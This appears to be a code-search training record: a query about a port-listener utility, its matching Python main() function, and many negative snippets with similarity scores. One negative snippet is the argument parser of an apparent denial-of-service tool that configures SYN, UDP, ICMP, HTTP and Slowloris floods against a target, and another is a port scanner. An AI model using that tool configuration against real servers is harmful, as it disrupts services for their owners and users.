elif incoming[0] == self.maori_sc:\n self.process_incoming(\n incoming[0], self.maori_sc, self.ports['Te reo Maori'])\n return True\n\n elif incoming[0] == self.german_sc:\n self.process_incoming(\n incoming[0], self.german_sc, self.ports['German'])\n return True\n\n else:\n print(responses.ERROR_FOREIGN_PORT)\n return False\n\n except:\n print(responses.ERROR_NO_SOCKET)\n return False", "def is_server_listening(self):\n 
self.log.info('Checking if the server is listening on TCP port {}'.format(self.upm_port))\n is_listening = connectivity.is_host_listening_tcp(host_address=self.upm_host,\n tcp_port=self.upm_port)\n if not is_listening:\n message = \"The server is not listening on TCP port {}\".format(self.upm_port)\n assert False, message\n self.log.info('The server is listening on TCP port {}'.format(self.upm_port))\n return True", "def test_subscribe_one_listener(self):\n def listener():\n pass\n EVENT_MANAGER.subscribe('test_listener', listener)\n self.assertIn(listener, EVENT_MANAGER._listeners['test_listener'])", "async def listened(self, value=None):\n pass", "def is_ready(self, addr: int, /) -> bool:", "def tcp_listening(port):\n return (\n subprocess.call(\n tcp_listening_cmd(port).split(),\n stdin=DEVNULL,\n stdout=DEVNULL,\n stderr=DEVNULL,\n close_fds=True,\n )\n == 0\n )", "def listen(self):\n pass", "def is_registered(self, event_type, callback, details_filter=None):\n listeners = self._topics.get(event_type, [])\n for listener in listeners:\n if listener.is_equivalent(callback, details_filter=details_filter):\n return True\n return False", "async def is_listened(self, ctx, id: int = None):\n if id is None:\n id = ctx.channel.id\n if id in self.etrigs['channels']:\n await ctx.send(f'Channel {self.bot.get_channel(id).mention} *is* being listened to for etriggers')\n else:\n await ctx.send(f'Channel {self.bot.get_channel(id).mention} *is **not*** being listened to for etriggers')", "def listening_for(message):\n\n if Utilities.isNotEmpty(message['text']):\n cmds = ['!whois', '!geoloc', '!ping']\n return message['text'].split()[0] in cmds", "def check_port(self):\r\n\t\treturn(self.connect.is_open)", "def wantsReadEvent(self):\r\n if self.result != None:\r\n return self.result == 0\r\n return None", "def handle(self, event):\n try:\n for event_listeners in self.listeners[event.type]:\n if event_listeners:\n for listener in event_listeners:\n if listener(event) is False:\n return False\n except KeyError:\n logger.insane('No listeners defined for event \"%s\"', hr_event_type(event.type))\n pass\n\n return True", "def listener(self, aaidee=0):\n return Listener(self._ptr, aaidee)", "def is_subscriber(self) -> bool:\n return self.subscriber", "def listen(address, port, community, mibs):\n snmp.listen(address, port, community, snmp.DEFAULT_MIBS + mibs)\n return 0", "def MulticastLoopback(self) -> bool:" ]
[ "0.66875106", "0.65970385", "0.6574591", "0.65360075", "0.6319728", "0.6317834", "0.6192521", "0.61528975", "0.6120801", "0.6109273", "0.60723865", "0.6063828", "0.60545415", "0.6010599", "0.5838284", "0.58022517", "0.5795148", "0.5793659", "0.57519114", "0.57032394", "0.5682425", "0.5673269", "0.5670093", "0.5619184", "0.5606707", "0.56055", "0.55855995", "0.5571002", "0.5562174", "0.5497071" ]
0.66736966
1
Process runtime args. Based on the args, run the program. Return the number of listeners for all provided ports. 100 == error for port
def main(): import getopt try: options, remainder = getopt.getopt( sys.argv[1:], '', ['help', # Print usage msg, exit 'short', # Output is shortened 'pid', # Output only pid of listenig process 'proc', # Output only process name of listening port 'kill', # Kill the process give its port ] ) except getopt.GetoptError as err: sys.stderr.write(str(err) + '\n') usage(1) shortened = False pid_only = False proc_only = False kill = False for opt, arg in options: if opt in ['--help']: usage(0) elif opt in ['--short']: shortened = True elif opt in ['--pid']: pid_only = True elif opt in ['--proc']: proc_only = True elif opt in ['--kill']: kill = True else: # Should never happen. getopt() will catch this. sys.stderr.write('Unhandled option:"%s"\n' % opt) usage(1) try: if len(remainder): for aport in remainder: int(aport) # Insist on a valid integer. else: remainder = [] remainder.append(PORT) except ValueError as err: sys.stderr.write('port number must be all numeric:%s\n' % str(remainder)) return 255 ret_code = 0 for aport in remainder: status = listening(aport, shortened, pid_only, proc_only, kill) if status == 255: return 255 # Illegal option ret_code += status return ret_code
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def portcheck_main(args=sys.argv[1:]):\n ports = portcheck(*args)\n for i in ports:\n print '%s: %s' % (i, ports[i])\n return 0", "def run_app():\n target = None\n negative_results = False\n\n description = 'Simple TCP port scanner'\n epilog = 'The author of this code take no responsibility for your use or misuse'\n parser = argparse.ArgumentParser(prog='TCPPortScan.py', description=description, epilog=epilog)\n parser.add_argument(\"target\", help=\"Your target to scan\")\n parser.add_argument('-p', '--port', help=\"Set a single port\", default=22, type=int)\n parser.add_argument('-r', '--range', help=\"Set a port range (eq 22-80)\")\n parser.add_argument(\"--all\", help=\"Show negative results (closed ports)\", action=\"store_true\")\n args = parser.parse_args()\n\n if len(args.target) < 1:\n print('You did not provide any target?')\n exit(1)\n else:\n target = args.target\n\n if args.all:\n negative_results = True\n\n if args.range:\n print(\"Start scanning ports {} on target {}\".format(args.range, target))\n range_list = args.range.split('-')\n for element in range(int(range_list[0]), int(range_list[1]) + 1):\n port_scan(target, element, negative_results)\n else:\n print(\"Start scanning port {} on target {}\".format(args.port, target))\n port_scan(target, args.port, negative_results)", "def usage(exit_code):\n\n sys.stderr.write(\"\"\"\n List the processes that are listening to a port.\n Defaults to ZeroMQ port of 5570.\n\n Use by:\n listeningPort [--help] [--short | --pid | --proc] [--kill] \\\n <port0> [<port1> ...]\n e.g.:\n listeningPort 5570 # The ZeroMQ default port\n listeningPort 5570 5571 5572 # Multiple ports may be checked\n listeningPort --short 5570\n listeningPort $(seq 5570 5580) # Ports 5570 through 5580 inclusive.\n\n For the case of a free port, output similar to:\n Port 5571 : Nobody listening\n\n --help = this message\n\n Only one of the following can be supplied:\n --short = Output consists of only three space separated fields:\n <port> <pid of listener> <process name of listener>\n Ports with nobody listening gets ignored for output.\n --pid = Output consists only of a pid\n --proc = Output consists only of process names\n --kill = Any ports with a listener will be killed with \"kill -9 <pid>\"\n\n Return codes:\n 255 == Invalid command line.\n 0 == Nobody listening to <port>\n > 0 == The number of ports someone is listening to.\n For a series of port, this value is the number\n of ports with a listener.\n For a single port, this will be 1 is someone\n is listening.\n \\n\n ***NOTICE***: This routine does NOT work on OSX!\n Replace this with:\n lsof -i<port> | awk '{ print $2; }' | head -2\n PID\n 18101\n This prints only the pid of the process using this port.\n Now use \"ps\" to find the process:\n ps ax | grep 18191 | grep -v grep\n 10191 s001 S+ 0:00.00 /usr/bin/python /usr/local/bin/logCollector\n \"\"\")\n sys.exit(exit_code)", "def cmd_port(args):", "def main(argv):\n # Our command line is trivial so I avoid an argparse import. 
If we ever\n # grow more than 1-2 args, switch to a using argparse.\n if '-h' in argv or '--help' in argv:\n print(argv[0], 'usage:\\n')\n import inspect\n print(inspect.getdoc(main))\n sys.exit(1)\n pid=int(argv[1]) if len(argv) > 1 else os.getppid()\n bind_timeout=float(argv[2]) if len(argv) > 2 else 0\n port = _pick_unused_port(pid=pid, noserver_bind_timeout=bind_timeout)\n if not port:\n sys.exit(1)\n print(port)", "def main(args):\n if '-' in args['-p']:\n tmp = args['-p'].split('-')\n tgtPorts = [str(i) for i in xrange(int(tmp[0]), int(tmp[1])+1)]\n else:\n tgtPorts = [args['-p']]\n tgtHost = args['-H']\n for tgtPort in tgtPorts:\n nmapScan(tgtHost, tgtPort)", "def main():\n\n # TODO: more advanced argument processing\n\n # Handle port\n port = None\n if len(sys.argv) > 1:\n port_arg = sys.argv[1]\n try:\n port = int(port_arg[1:] if port_arg.startswith(':') else port_arg)\n except:\n pass\n\n try:\n serve(port=port)\n except ValueError, ex:\n # Show input error\n print 'Error:', ex", "def main(cls, args=None):\n parser = cls.CreateParser()\n cls.AddCommandLineArgs(parser, None)\n options, extra_args = parser.parse_known_args(args=args)\n cls.ProcessCommandLineArgs(parser, options, extra_args, None)\n return min(cls().Run(options, extra_args), 255)", "def portkill_main(args=sys.argv[1:]):\n # Probably should use optparse or some such.\n kw = {}\n if '-v' in args:\n kw['verbose'] = True\n args = [a for a in args if a != '-v']\n if '-s' in args:\n index = args.index('-s')\n kw['sleeptime'] = args[index + 1]\n args = args[:index] + args[index+2:]\n portkill(*args, **kw)\n return 0", "def main(\n args: Sequence[str] = sys.argv[1:],\n) -> None:\n options = argument_parser().parse_args(args)\n\n valid_passports = 0\n\n for record in parse_passport_records(options.source):\n if options.verbose:\n print(record, file=sys.stderr)\n try:\n validate_passport(record, permissive=options.permissive)\n except ValueError as exc:\n if options.verbose:\n print(str(exc), file=sys.stderr)\n else:\n valid_passports += 1\n\n print(valid_passports)", "def main():\n\n if (len(sys.argv) < 3):\n print 'Usage: python serverclient.py <server|client> <port>\\n'\n return -1\n else:\n if sys.argv[1].lower() == 'server':\n Server(sys.argv[2])\n elif sys.argv[1].lower() == 'client':\n Client(sys.argv[2])\n else:\n print 'Unrecognized argument: ', sys.argv[1]\n return -1\n return 0", "def main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python server-python.py [Server Port]\")\n server_port = int(sys.argv[1])\n server(server_port)", "def main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python server-python.py [Server Port]\")\n server_port = int(sys.argv[1])\n server(server_port)", "def get_sshuttle_args_count(proc_name):\n procs = subprocess.check_output(['ps', '-eo', 'comm,args']).splitlines()\n name_procs = [proc for proc in procs if proc_name.encode() in proc]\n\n if len(name_procs) > 1:\n return -1\n elif len(name_procs) == 0:\n return 0\n else:\n nets = re.split('\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/\\d{1,3}', name_procs[0])\n return len(nets)-1", "def main():\n lgs = LifeGenServer()\n lgs.listening()", "def listening(port,\n shortened=False,\n pid_only=False,\n proc_only=False,\n kill=False):\n if platform.system() not in ['Darwin', 'Linux']:\n sys.stderr.write('listeningPort available only under Linux and Darwin!\\n')\n sys.exit(-1)\n\n fuser = find_executable('fuser')\n if fuser == None:\n print('Cannot find \"fuser\". 
Exiting.')\n sys.exit(1)\n proc = subprocess.Popen('%s %s/tcp' % (fuser, str(port)),\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n line = proc.stdout.readline()\n #print('fuserline:%s' % line)\n subproc_items = line.split()\n if len(subproc_items) == 0:\n if shortened is False:\n sys.stdout.write('Port %s : Nobody listening\\n' %\n str(port))\n return 0\n pid = subproc_items[-1]\n proc.wait()\n\n # \"pid\" now has the PID of the process listening to the port.\n # Map that to a process name.\n # procName = subprocess.Popen('ps x %s' % pid, shell=True,\n out, err = subprocess.Popen('/usr/bin/ps x | /usr/bin/grep %s' % pid,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT).communicate()\n if err and len(err):\n sys.stderr.write(err + '\\n')\n for line in out.splitlines():\n items = line.split()\n if (len(items) > 0) and (items[0] != pid): \n # Ignore all but requested pid\n continue\n\n # Kill the process if requested.\n if kill:\n print('killing pid %d' % pid)\n p = psutil.Process(int(pid))\n p.terminate() # Kill the process.\n return 1\n\n # Branch on requested output\n if shortened:\n sys.stdout.write('%s %s %s\\n' % (str(port),\n pid, ' '.join(items[5:])))\n elif pid_only:\n sys.stdout.write('%s\\n' % pid)\n elif proc_only:\n sys.stdout.write('%s\\n' % ' '.join(items[4:]))\n else:\n sys.stdout.write('Port %s : listening thru pid %s %s\\n' %\n (str(port), pid, ' '.join(items[5:])))\n return 1\n\n return 0", "def main():\n args = parse_args()\n process_args(args)", "def analyze_local_server_binary_get_ports(target_binary, target_platform):\n log(\"warning: this will run the binary on your local machine, this could put you at risk\")\n detect_ports = prompt_yn(\"magically detect ports?\")\n port = -1\n if detect_ports:\n try:\n # start the server\n log(\"starting the binary\")\n if target_platform == PLATFORM_WINDOWS:\n log(\"using wine\")\n server_instance = subprocess.Popen([\"wine\", target_binary], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n else:\n log(\"running binary\")\n server_instance = subprocess.Popen([target_binary], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # give it time to start up\n log(\"allowing time to start\")\n time.sleep(LOAD_TIME)\n\n # grab netstat results\n netstat_results = subprocess.check_output([\"netstat\", \"-lnpt\"], stderr=subprocess.PIPE).decode(\"utf-8\")\n\n # ignore anything without pid of the server or the \"LISTEN\" status\n netstat_results = [line for line in netstat_results.splitlines() if str(server_instance.pid) in line and \"LISTEN\" in line]\n\n # extract port numbers\n ports = [int(re.search(r\":\\d+\", line).group(0).strip(\":\")) for line in netstat_results]\n \n # select port numbers\n if len(ports) > 1:\n port = prompt_list(\"select a port to target\", ports)\n elif len(ports) == 1:\n port = ports[0]\n else:\n log(\"unable to detect port\")\n except:\n log(\"failed to magically get the port\")\n finally:\n # clean up\n log(\"killing the server\")\n server_instance.kill()\n\n # check if valid port detected\n if not (1 <= port <= 65535):\n # prompt the user for a port if not\n port = prompt_number(\"target port?\")\n\n log(f\"target port {port}\")\n return port", "def run(self, port_update_args, network_create_args=None,\n port_create_args=None, ports_per_network=1):\n network = self._get_or_create_network(**(network_create_args or {}))\n for i in range(ports_per_network):\n port = self.neutron.create_port(\n network[\"id\"], **(port_create_args or {}))\n 
self.neutron.update_port(port[\"id\"], **port_update_args)", "def listen_fds(unset_environment=True):\n fds = int(os.environ.get('LISTEN_FDS', 0))\n listen_pid = int(os.environ.get('LISTEN_PID', 0))\n\n if listen_pid != os.getpid():\n return 0\n\n if unset_environment:\n os.environ.pop('LISTEN_PID', None)\n os.environ.pop('LISTEN_FDS', None)\n\n return fds", "def initialize_and_run(self, port, host=''):\n port = int(port)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((host, port))\n while True:\n self.sock.listen(5) # TODO: make this configurable\n conn, addr = self.sock.accept()\n raw_command = conn.recv(1024)\n splitted = raw_command.split()\n if splitted:\n command, args = splitted[0], splitted[1:]\n else:\n command, args = b'', b''\n command = command.decode()\n args = [x.decode() for x in args]\n\n try:\n result = self.handler(command, args)\n except Exception:\n logger.info(traceback.format_exc())\n # kill all the child processes\n self.handle_killall()\n result = 'Error occured. Please check log at /tmp/assistant.log.' # noqa\n\n out = '{}\\n'.format(result)\n conn.send(try_encode(out))\n conn.close()", "def main():\n return run_server(**parse_server_args())", "def get_port_counts(ssh):\r\n cmd02='netstat -na'\r\n retry_number=3\r\n try:\r\n while True:\r\n if retry_number == 0:\r\n logger.writeLog(\"get port counts fail\",level='error')\r\n break\r\n stdin,stdout,stderr=ssh.exec_command(cmd02)\r\n data02=(stdout.read().decode('gbk').strip().replace(' ','').replace('\\t','').replace('\\r','').replace('\\n',''))\r\n print(data02)\r\n if data02 == \"\":\r\n retry_number -= 1\r\n logger.writeLog(\"port counts data is null\",level='error')\r\n continue\r\n else:\r\n pattern=re.compile('1.*?:22',re.S)\r\n match_list=re.findall(pattern,data02)\r\n print(match_list)\r\n port_count=len(match_list)\r\n logger.writeLog(\"get port counts success\",level='info')\r\n print(\"port connected counts:\",port_count)\r\n return port_count\r\n break\r\n except:\r\n logger.writeLog(\"get port counts error\",level='error')\r\n return None", "def detect_used_ports():\n MAX_PORT = 1025\n DEFAULT_HOST = '127.0.0.1'\n open_ports = []\n socket.setdefaulttimeout(1)\n for port in range(0, MAX_PORT):\n res = port_scan(DEFAULT_HOST, port)\n if res:\n open_ports.append(port)\n # debugging purpose to see if program is running\n if port % 5000 == 0 and port != 0:\n sys.stderr.write('.')\n return open_ports", "def set_arguments(parser):\n args = parser.parse_args()\n\n if not args.ip:\n parser.print_help()\n show_error(\"The IP address of web server is required\")\n\n if not args.udp and not args.syn and not args.fudp and not args.ipsec and not args.icmp and not args.ficmp and not args.http and not args.slow:\n parser.print_help()\n show_error(\"At least one type of attack is required\")\n\n if args.port:\n if args.port > 0 and args.port <= 65535:\n global destination_port\n destination_port = args.port\n else:\n parser.print_help()\n show_error(\"Wrong port number\")\n\n if (args.udp or args.syn or args.fudp or args.ipsec or args.slow or args.http) and not args.port:\n parser.print_help()\n show_error(\"Port number for IPSEC, UDP, TCP, HTTP, protocols is required\")\n\n if (args.icmp or args.ficmp) and args.port and (not args.udp and not args.syn and not args.fudp and not args.ipsec and not args.http and not args.slow):\n print(\"WARNING: port number only for UDP, TCP, IPSEC protocols is required.\")\n time.sleep(3)\n\n if args.icmp:\n if args.icmp > 0 and args.icmp <= 300:\n 
global processes_icmp\n processes_icmp = args.icmp\n else:\n parser.print_help()\n show_error(\"Wrong processes count\") \n\n if args.ficmp:\n if args.ficmp > 0 and args.ficmp <= 300:\n global processes_ficmp\n processes_ficmp = args.ficmp\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.ipsec:\n if args.ipsec > 0 and args.ipsec <= 300:\n global processes_ipsec\n processes_ipsec = args.ipsec\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.syn:\n if args.syn > 0 and args.syn <= 300:\n global processes_syn\n processes_syn = args.syn\n else:\n parser.print_help()\n show_error(\"Wrong processes count 100\")\n\n if args.udp:\n if args.udp > 0 and args.udp <= 300:\n global processes_udp\n processes_udp = args.udp\n else:\n parser.print_help()\n show_error(\"Wrong processes count 100\")\n\n if args.fudp:\n if args.fudp > 0 and args.fudp <= 300:\n global processes_fudp\n processes_fudp = args.fudp\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.http:\n if args.http > 0 and args.http <= 300:\n global processes_http\n processes_http = args.http\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.slow:\n if args.slow > 0 and args.slow <= 300:\n if not args.sockets:\n parser.print_help()\n show_error(\"Sockets count is required\")\n if args.sockets >= 1 and args.sockets <= 1000:\n global socket_count\n socket_count = args.sockets\n else:\n parser.print_help()\n show_error(\"Wrong sockets count\")\n\n global processes_slowloris\n processes_slowloris = args.slow\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if not args.slow and args.sockets:\n print(\"WARNING: sockets only for Slowloris are required.\")\n time.sleep(3)\n\n global destination_ip\n destination_ip = args.ip", "def parse_args():\n if len(sys.argv) < REQUIRED_NUM_ARGS or len(sys.argv) > MAXIMUM_NUM_ARGS:\n error_quit(\"Incorrect number of arguments!\", 400)\n # Set port to DEFAULT if not specified as an arg. Otherwise, port = portarg.\n port = sys.argv[PORT_ARG_NUM] if len(sys.argv) == MAXIMUM_NUM_ARGS else DEFAULT_FTP_PORT\n port = validate_port(port)\n # Get host address and logfile name from args.\n host, log_file = sys.argv[HOST_ARG_NUM], sys.argv[LOG_ARG_NUM]\n return host, log_file, port", "def main(args):\n\n args = parse_args(args)\n setup_logging(args.loglevel)\n \n app.run(port='5002')", "def listen(address, port, community, mibs):\n snmp.listen(address, port, community, snmp.DEFAULT_MIBS + mibs)\n return 0", "def main():\n parser = create_arg_parser()\n\n # If script run without arguments, print syntax\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n # Parse arguments\n args = parser.parse_args()\n host = args.h\n mode = args.m\n port = args.p\n debug_mode = args.debug\n\n # Run server with user-given arguments\n run_server(host, port, mode, debug_mode)", "def run():\n _input = sys.stdin\n count = count_by_code(_input, 404)\n print(count)" ]
[ "0.6942394", "0.66215736", "0.63740706", "0.62902844", "0.60026693", "0.5923105", "0.58010936", "0.57660186", "0.5717203", "0.56580085", "0.5623557", "0.55659944", "0.55659944", "0.55630726", "0.5499098", "0.5495286", "0.54854834", "0.5462336", "0.54213244", "0.5405209", "0.53990555", "0.53937405", "0.53921616", "0.53828424", "0.53809136", "0.5370043", "0.53672826", "0.5355639", "0.53555673", "0.52980787" ]
0.7322132
0
Testing opssysd correctly stores switch_version column. Test if the opssysd correctly parse the osrelease file and stores the information in the OVSDB.
def check_switch_version(dut, file_name): copy_os_release_file(dut, file_name) # Restart the ovsdb-server and sysd start(dut) version_id = read_os_release_file(dut, file_name, 'VERSION_ID') build_id = read_os_release_file(dut, file_name, 'BUILD_ID') expected = "{0} (Build: {1})".format(version_id, build_id) result = get_switch_version(dut) assert result == expected
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_update_hyperflex_server_firmware_version(self):\n pass", "def init_linuxVersion(self):\n releaseDic = collections.OrderedDict() # 排序的字典\n releaseDic['/etc/oracle-release'] = self.__getOracleVersion\n releaseDic['/etc/redhat-release'] = self.__getRedhatVersion\n releaseDic['/etc/debian_version'] = self.__getDebianVersion\n releaseDic['/etc/SuSE-release'] = self.__getSuSEVersion\n # for releaseFilePath in releaseDic.keys():\n # print(releaseFilePath)\n #\n # releaseDic = {'/etc/oracle-release': self.__getOracleVersion,\n # '/etc/redhat-release': self.__getRedhatVersion,\n # '/etc/debian_version': self.__getDebianVersion,\n # '/etc/SuSE-release': self.__getSuSEVersion}\n for releaseFilePath in releaseDic.keys():\n ret, resultErr = self.ksp_ssh.ssh_execute_command(\n '[[ -f %s ]] && echo \"exist\" || echo \"not exist\"' % releaseFilePath)\n if 'not' in ret:\n continue\n else:\n return releaseDic.get(releaseFilePath, self.__getNullVersion)()\n return \"unknownVendor\", \"unknownRelease\"", "def test_os_release(self):\n self.assertEqual(self.settings.OS_RELEASE, platform.release())", "def _init_obo_version(self, line):\n if line[0:14] == \"format-version\":\n self.format_version = line[16:-1]\n if line[0:12] == \"data-version\":\n self.data_version = line[14:-1]", "def test_patch_hyperflex_server_firmware_version(self):\n pass", "def test_update_hyperflex_hxdp_version(self):\n pass", "def __getSuSEVersion(self):\n linuxVendor = \"SuSE\"\n linuxRelease, resultErr = self.ksp_ssh.ssh_execute_command(\n \"grep 'VERSION' /etc/SuSE-release | cut -d= -f2 | tr -d ' \\n'\")\n return linuxVendor.strip(), linuxRelease.strip()", "def test_parse_version(self):\n self.assertEqual(\n _parse_sw_version('BaiStation_V100R001C00B110SPC003'),\n [100, 1, 0, 110, 3],\n )\n self.assertEqual(\n _parse_sw_version('BaiStation_V100R001C00B060SPC012'),\n [100, 1, 0, 60, 12],\n )\n self.assertEqual(\n _parse_sw_version('BaiStation_V100R001C00B060SPC012_FB_3'),\n [100, 1, 0, 60, 12],\n )\n # Incorrect number of digits\n self.assertEqual(\n _parse_sw_version('BaiStation_V10R001C00B060SPC012'),\n None,\n )\n self.assertEqual(\n _parse_sw_version('XYZ123'),\n None,\n )\n self.assertEqual(\n _parse_sw_version(''),\n None,\n )", "def __getOracleVersion(self):\n linuxVendor = \"Oracle\"\n linuxRelease, resultErr = self.ksp_ssh.ssh_execute_command(\n \"cat /etc/oracle-release | sed 's/^Oracle Linux Server release /OL/' | sed 's/[ .].*//' \") # El8\n return linuxVendor.strip(), linuxRelease.strip() # strip()删除开头结尾的空格", "def test_update_hyperflex_software_version_policy(self):\n pass", "def test_SSLeay_version(self):\n versions = {}\n for t in [\n SSLEAY_VERSION,\n SSLEAY_CFLAGS,\n SSLEAY_BUILT_ON,\n SSLEAY_PLATFORM,\n SSLEAY_DIR,\n ]:\n version = SSLeay_version(t)\n versions[version] = t\n assert isinstance(version, bytes)\n assert len(versions) == 5", "def _extract_nos_version(self, data: str) -> None:\n if self.devtype == \"linux\":\n for line in data.splitlines():\n if line.startswith(\"VERSION_ID\"):\n self.version = line.split('=')[1] \\\n .strip().replace('\"', '')\n break\n else:\n self.version = \"all\"\n self.logger.error(\n f'Cannot parse version from {self.address}:{self.port}')", "def testStratisVersion(self):\n version = Manager.Properties.Version.Get(get_object(TOP_OBJECT))\n (major, _, _) = version.split(\".\")\n self.assertEqual(major, \"0\")", "def test_version(self):\n config = {\"sensor\": {\"platform\": \"version\", \"name\": \"test\"}}\n\n with patch(\"openpeerpower.const.__version__\", 
MOCK_VERSION):\n assert setup_component(self.opp, \"sensor\", config)\n self.opp.block_till_done()\n\n state = self.opp.states.get(\"sensor.test\")\n\n assert state.state == \"10.0\"", "def test_create_hyperflex_server_firmware_version(self):\n pass", "def test_release_version():\n pkg_vars = {}\n with open(VERSION_FILE) as f:\n exec(f.read(), pkg_vars) # nosec\n project_version = pkg_vars[\"__version__\"]\n assert (\n RELEASE_TAG == f\"v{project_version}\"\n ), \"RELEASE_TAG does not match the project version\"", "def test_versionInfo(self):\n self.assertEqual(\n nevow.__version_info__,\n (nevow.version.major, nevow.version.minor, nevow.version.micro))", "def test_update_pci_switch(self):\n pass", "def test_version(self):\n v = version('/no/such/executable')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('false')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('echo')\n self.assertEqual(v, 'describe .devrev-list --count HEAD')", "def test_get_version(self):\n pass", "def check_os_version():\n if not version.is_supported_version():\n supported_releases = []\n for rel in version.SUPPORTED_VERSIONS:\n for ver in version.SUPPORTED_VERSIONS[rel]:\n supported_releases.append(rel.upper() + ' ' + ver)\n reporting.create_report([\n reporting.Title(\n 'The installed OS version is not supported for the in-place upgrade to the target RHEL version'\n ),\n reporting.Summary(\n 'The supported OS releases for the upgrade process:\\n'\n ' {}'.format('\\n'.join(supported_releases))\n ),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS),\n reporting.Groups([reporting.Groups.INHIBITOR]),\n # we want to set a static Key here because of different Title per path\n reporting.Key('1c7a98849a747ec9890f04bf4321de7280970715')\n ] + related)", "def test_firmware_version(self):\n self._verify_firmware_version()", "def get_required_ovs_version(self):\n return self.get_required_version(\"Open vSwitch\", self.openshift_to_ovs_version)", "def test_save_tsc_old_version(uvm_nano):\n uvm_nano.start()\n uvm_nano.snapshot_full(target_version=\"0.24.0\")\n uvm_nano.check_log_message(\"Saving to older snapshot version, TSC freq\")", "def test_command_edit_info_version_1_to_2():\n with tempfile.NamedTemporaryFile() as tmp:\n shutil.copy(kValid1, tmp.name)\n\n wozardry.parse_args([\"edit\", \"-i\", \"version:2\", tmp.name])\n with open(tmp.name, \"rb\") as tmpstream:\n woz = wozardry.WozDiskImage(tmpstream)\n assert woz.image_type == wozardry.kWOZ2\n assert woz.info[\"version\"] == 2\n assert woz.info[\"boot_sector_format\"] == 0\n assert woz.info[\"optimal_bit_timing\"] == 32\n assert woz.info[\"compatible_hardware\"] == []\n assert woz.info[\"required_ram\"] == 0", "def test_smc_version_value(self):\n \n smc_version = get_smc_version()\n \n # Check to make sure the smc_version is '2.15f7'\n self.assertEqual(smc_version, '2.15f7')", "def check_openmanage_version():\n try:\n # Because of\n # https://github.com/rcbops/rcbops-maas/issues/82#issuecomment-52315709\n # we need to redirect sdterr to stdout just so MaaS does not see any\n # extra output\n output = subprocess.check_output(['/opt/dell/srvadmin/bin/omconfig',\n 'about'],\n stderr=subprocess.STDOUT).decode('UTF-8')\n except OSError:\n # OSError happens when subprocess cannot find the executable to run\n status_err('The OpenManage tools do not appear to be installed.',\n m_name='maas_hwvendor')\n except subprocess.CalledProcessError as e:\n status_err(str(e), m_name='maas_hwvendor')\n\n match = re.search(OM_PATTERN % {'field': 
'Version',\n 'group_pattern': '[0-9.]+'},\n output)\n if not match:\n status_err('Could not find the version information',\n m_name='maas_hwvendor')\n\n version = match.groups()[0]\n if version not in SUPPORTED_VERSIONS:\n status_err(\n 'Expected version in %s to be installed but found %s'\n % (SUPPORTED_VERSIONS, version),\n m_name='maas_hwvendor'\n )", "def test_version_sensor(self):\n config = {\"sensor\": {\"platform\": \"version\"}}\n\n assert setup_component(self.opp, \"sensor\", config)", "def test_version(self):\n result = check_output([b\"flocker-changestate\"] + [b\"--version\"])\n self.assertEqual(result, b\"%s\\n\" % (__version__,))", "def _collect_sonic_os_and_platform_info(duthost, request):\n logger.info(\"Getting SONiC OS version and Testbed platform info.\")\n\n out = duthost.shell(\"cd {0} && show version\".format(DUT_WORKING_DIR))\n _parse_info(out['stdout'], request.config.option.sai_test_report_dir)" ]
[ "0.59922117", "0.58298945", "0.5813068", "0.5752418", "0.57282406", "0.5699847", "0.56906575", "0.56672615", "0.56032926", "0.5582374", "0.55770415", "0.5560227", "0.5493755", "0.5482867", "0.5482622", "0.54738504", "0.5470605", "0.5469388", "0.5446355", "0.54303396", "0.5381754", "0.53696454", "0.53587615", "0.53510725", "0.53397375", "0.5316838", "0.5314408", "0.5308705", "0.53069884", "0.5296518" ]
0.6845919
0
Read the local osrelease file and return the data.
def read_os_release_file(dut, fname=default_os_release_file, key=None): cur_dir, f = os.path.split(__file__) path = os.path.join(cur_dir, os_release_files_dir, fname) d = {} with open(path) as f: for line in f: k, v = line.rstrip().split("=") d[k] = v if key: return d[key] else: return d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def versionRead():\n xuvtop = os.environ['XUVTOP']\n vFileName = os.path.join(xuvtop, 'VERSION')\n vFile = open(vFileName)\n versionStr = vFile.readline()\n vFile.close()\n return versionStr.strip()", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n raise StopActorExecutionError(\n message='Cannot collect the system OS facts.',\n details={'details': str(e)}\n )", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', 